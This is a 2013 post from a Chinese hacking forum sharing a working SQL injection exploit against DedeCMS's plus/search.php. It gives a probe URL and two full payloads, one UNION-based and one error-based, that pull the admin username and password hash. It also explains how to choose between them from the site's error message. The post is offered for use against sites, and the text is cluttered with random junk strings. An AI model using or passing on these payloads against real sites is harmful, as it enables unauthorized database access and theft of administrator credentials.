找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1951|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
" z+ B1 M( b, q% M& U
$ g* `5 G5 w2 H哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
% T* d; r& m& K8 q
3 ]0 L& E) ]0 f- j+ {5 J既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
0 K; T3 J! x* @( }: k6 }- A. y% H8 d" y9 W
我一般是这样测试的:8 s! L2 N4 T5 L* F. ?
, h* h4 t/ ~0 J8 J- b, T. i
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a$ W2 M1 {- p8 C7 M. T. N4 J

- z: i1 k$ l! P3 v) N转载不加作者名的没JJ9 h- @" E8 B* z+ E
! }2 T/ [; [' |+ L3 p9 \$ `
作者:鬼哥
' u( Q9 r* V0 Z( R2 l
: O) x# _  ]: g. n/ s3 K
( j' L) F" V0 |1 A
/ x9 a% h/ w; @看结果如果提示/ l! i) t, G5 b

* y$ E# X! g" ?3 ^. a' }3 S; nSafe Alert: Request Error step 2 !6 _+ K# _' N, A! M3 B3 V
* Y( y5 F) O/ N, y9 q0 r
那么直接用下面的exp
3 j( N; J3 L4 y; ~! c* w3 j8 e7 a+ x2 h- r
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
# v) f  A. D9 }1 H) \- H
/ b4 `  I; D+ o& m8 ~/ w4 v8 I( D7 \
! H. C) a2 m5 o4 ]- R看结果如果提示+ t( J' e9 o* q
: }, t" @% M* J: \- U$ V5 t+ @3 @3 W
Safe Alert: Request Error step 1 !
( C4 o3 B) X/ A4 Z! f) q
% K* _+ n" x7 U2 t那么直接用下面的exp
, K+ [  e2 V" r1 Z( [$ z
* b: |$ _' j' Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# W* [7 _1 m$ c8 G. @  |+ r

, Z7 |  ^% Y9 D  T4 A" E
" S* R- ~2 e: G3 U% e如果正常显示证明漏洞不存在了。
1 G) o  Y& v5 ?& b5 O+ j( [/ B
9 l+ v6 L" g7 O) W+ G转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表